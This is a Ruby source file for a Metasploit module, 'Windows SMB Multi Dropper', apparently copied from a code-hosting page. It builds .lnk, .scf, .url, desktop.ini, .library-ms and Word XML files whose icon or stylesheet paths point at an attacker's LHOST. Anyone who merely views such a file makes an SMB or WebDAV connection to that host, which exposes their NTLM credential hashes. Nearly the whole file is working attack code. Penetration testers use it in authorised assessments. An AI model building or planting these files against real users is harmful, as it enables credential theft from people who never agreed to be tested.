203 lines
7.8 KiB
Ruby
203 lines
7.8 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Auxiliary
|
|
include Msf::Exploit::FILEFORMAT
|
|
|
|
def initialize(info = {})
|
|
super(
|
|
update_info(
|
|
info,
|
|
'Name' => 'Windows SMB Multi Dropper',
|
|
'Description' => %q{
|
|
This module dependent on the given filename extension creates either
|
|
a .lnk, .scf, .url, .xml, .library-ms, or desktop.ini file which includes
|
|
a reference to the specified remote host, causing SMB connections to be
|
|
initiated from any user that views the file.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' => [
|
|
'Richard Davy - secureyourit.co.uk', # Module written by Richard Davy
|
|
'mubix', # Lnk Creation Code written by Mubix
|
|
'asoto-r7', # Word XML creation code
|
|
'hyp3rlinx', # .library-ms technique
|
|
'bcoles', # Added .library-ms support
|
|
],
|
|
'Platform' => [ 'win' ],
|
|
'References' => [
|
|
['URL', 'https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018'],
|
|
['URL', 'https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/'],
|
|
['URL', 'https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/'],
|
|
['URL', 'https://web.archive.org/web/20190106181024/https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.LIBRARY-MS-FILETYPE-INFORMATION-DISCLOSURE.txt'],
|
|
],
|
|
'Notes' => {
|
|
'Stability' => [CRASH_SAFE],
|
|
'SideEffects' => [],
|
|
'Reliability' => []
|
|
}
|
|
)
|
|
)
|
|
register_options(
|
|
[
|
|
OptAddress.new('LHOST', [ true, 'Host listening for incoming SMB/WebDAV traffic', nil]),
|
|
OptString.new('FILENAME', [ true, 'Filename - supports *.lnk, *.scf, *.url, *.xml, *.library-ms, desktop.ini', 'word.lnk']),
|
|
]
|
|
)
|
|
end
|
|
|
|
def run
|
|
if datastore['FILENAME'].chars.last(3).join == 'lnk'
|
|
createlnk
|
|
elsif datastore['FILENAME'].chars.last(3).join == 'scf'
|
|
createscf
|
|
elsif datastore['FILENAME'] == 'desktop.ini'
|
|
create_desktopini
|
|
elsif datastore['FILENAME'].chars.last(3).join == 'url'
|
|
create_url
|
|
elsif datastore['FILENAME'].chars.last(3).join == 'xml'
|
|
create_xml
|
|
elsif datastore['FILENAME'].ends_with?('.library-ms')
|
|
create_libraryms
|
|
else
|
|
fail_with(Failure::BadConfig, 'Invalid FILENAME option')
|
|
end
|
|
end
|
|
|
|
def createlnk
|
|
# Code below taken from module droplnk.rb written by Mubix
|
|
lnk = ''
|
|
lnk << "\x4c\x00\x00\x00" # Header size
|
|
lnk << "\x01\x14\x02\x00\x00\x00\x00\x00" # Link CLSID
|
|
lnk << "\xc0\x00\x00\x00\x00\x00\x00\x46"
|
|
lnk << "\xdb\x00\x00\x00" # Link flags
|
|
lnk << "\x20\x00\x00\x00" # File attributes
|
|
lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01" # Creation time
|
|
lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01" # Access time
|
|
lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01" # Write time
|
|
lnk << "\x00\x00\x00\x00" # File size
|
|
lnk << "\x00\x00\x00\x00" # Icon index
|
|
lnk << "\x01\x00\x00\x00" # Show command
|
|
lnk << "\x00\x00" # Hotkey
|
|
lnk << "\x00\x00" # Reserved
|
|
lnk << "\x00\x00\x00\x00" # Reserved
|
|
lnk << "\x00\x00\x00\x00" # Reserved
|
|
lnk << "\x7b\x00" # IDListSize
|
|
# sIDList
|
|
lnk << "\x14\x00\x1f\x50\xe0\x4f\xd0\x20"
|
|
lnk << "\xea\x3a\x69\x10\xa2\xd8\x08\x00"
|
|
lnk << "\x2b\x30\x30\x9d\x19\x00\x2f"
|
|
lnk << 'C:\\'
|
|
lnk << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
|
lnk << "\x00\x00\x00\x4c\x00\x32\x00\x00\x00\x00\x00\x7d\x3f\x5b\x15\x20"
|
|
lnk << "\x00"
|
|
lnk << 'AUTOEXEC.BAT'
|
|
lnk << "\x00\x00\x30\x00\x03\x00\x04\x00\xef\xbe\x7d\x3f\x5b\x15\x7d\x3f"
|
|
lnk << "\x5b\x15\x14\x00\x00\x00"
|
|
lnk << Rex::Text.to_unicode('AUTOEXEC.BAT')
|
|
lnk << "\x00\x00\x1c\x00\x00\x00"
|
|
# sLinkInfo
|
|
lnk << "\x3e\x00\x00\x00\x1c\x00\x00\x00\x01\x00"
|
|
lnk << "\x00\x00\x1c\x00\x00\x00\x2d\x00\x00\x00\x00\x00\x00\x00\x3d\x00"
|
|
lnk << "\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x3e\x77\xbf\xbc\x10\x00"
|
|
lnk << "\x00\x00\x00"
|
|
lnk << 'C:\\AUTOEXEC.BAT'
|
|
lnk << "\x00\x00\x0e\x00"
|
|
# RELATIVE_PATH
|
|
lnk << Rex::Text.to_unicode('.\\AUTOEXEC.BAT')
|
|
lnk << "\x03\x00"
|
|
# WORKING_DIR
|
|
lnk << Rex::Text.to_unicode('C:\\')
|
|
# ICON LOCATION
|
|
lnk << "\x1c\x00"
|
|
lnk << Rex::Text.to_unicode("\\\\#{datastore['LHOST']}\\icon.ico")
|
|
lnk << "\x00\x00\x03\x00\x00\xa0\x58\x00\x00\x00\x00\x00\x00\x00"
|
|
lnk << 'computer'
|
|
lnk << "\x00\x00\x00\x00\x00\x00\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"
|
|
lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"
|
|
lnk << "\x08\x00\x27\x6f\xe3\x1f\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"
|
|
lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"
|
|
lnk << "\x08\x00\x27\x6f\xe3\x1f\x00\x00\x00\x00"
|
|
|
|
file_create(lnk)
|
|
end
|
|
|
|
def createscf
|
|
scf = ''
|
|
scf << "[Shell]\n"
|
|
scf << "Command=2\n"
|
|
scf << "IconFile=\\\\#{datastore['LHOST']}\\test.ico\n"
|
|
scf << "[Taskbar]\n"
|
|
scf << 'Command=ToggleDesktop'
|
|
|
|
file_create(scf)
|
|
end
|
|
|
|
def create_desktopini
|
|
ini = ''
|
|
ini << "[.ShellClassInfo]\n"
|
|
ini << "IconFile=\\\\#{datastore['LHOST']}\\icon.ico\n"
|
|
ini << 'IconIndex=1337'
|
|
|
|
file_create(ini)
|
|
end
|
|
|
|
def create_url
|
|
url = ''
|
|
url << "[InternetShortcut]\n"
|
|
url << "URL=file://#{datastore['LHOST']}/url.html\n"
|
|
url << "IconFile=\\\\#{datastore['LHOST']}\\icon.ico\n"
|
|
|
|
file_create(url)
|
|
end
|
|
|
|
def create_libraryms
|
|
xml = ''
|
|
xml << '<?xml version="1.0" encoding="UTF-8"?>'
|
|
xml << '<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">'
|
|
xml << '<name>@shell32.dll,-34575</name>'
|
|
xml << '<ownerSID>S-1-5-21-372074477-2495183225-776587326-1000</ownerSID>'
|
|
xml << '<version>1</version>'
|
|
xml << '<isLibraryPinned>true</isLibraryPinned>'
|
|
xml << "<iconReference>\\\\#{datastore['LHOST']}\\icon.ico</iconReference>"
|
|
xml << '<templateInfo>'
|
|
xml << '<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>'
|
|
xml << '</templateInfo>'
|
|
xml << '<searchConnectorDescriptionList>'
|
|
xml << '<searchConnectorDescription publisher="Microsoft" product="Windows">'
|
|
xml << '<description>@shell32.dll,-34577</description>'
|
|
xml << '<isDefaultSaveLocation>true</isDefaultSaveLocation>'
|
|
xml << '<simpleLocation>'
|
|
xml << '<url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url>'
|
|
xml << '<serialized>MBAAAEAFCAAA...MFNVAAAAAA</serialized>'
|
|
xml << '</simpleLocation>'
|
|
xml << '</searchConnectorDescription>'
|
|
xml << '<searchConnectorDescription publisher="Microsoft" product="Windows">'
|
|
xml << '<description>@shell32.dll,-34579</description>'
|
|
xml << '<isDefaultNonOwnerSaveLocation>true</isDefaultNonOwnerSaveLocation>'
|
|
xml << '<simpleLocation>'
|
|
xml << '<url>knownfolder:{ED4824AF-DCE4-45A8-81E2-FC7965083634}</url>'
|
|
xml << '<serialized>MBAAAEAFCAAA...HJIfK9AAAAAA</serialized>'
|
|
xml << '</simpleLocation>'
|
|
xml << '</searchConnectorDescription>'
|
|
xml << '</searchConnectorDescriptionList>'
|
|
xml << '</libraryDescription>'
|
|
|
|
file_create(xml)
|
|
end
|
|
|
|
def create_xml
|
|
xml = ''
|
|
xml << "<?xml version='1.0' encoding='utf-8' ?>"
|
|
xml << "<?mso-application progid='Word.Document'?>"
|
|
xml << "<?xml-stylesheet type='text/xsl' href='file://#{datastore['LHOST']}/share/word.xsl'?>"
|
|
xml << '<Text>'
|
|
xml << ' FATAL ERROR: The document failed to render properly.'
|
|
xml << '</Text>'
|
|
|
|
file_create(xml)
|
|
end
|
|
|
|
end
|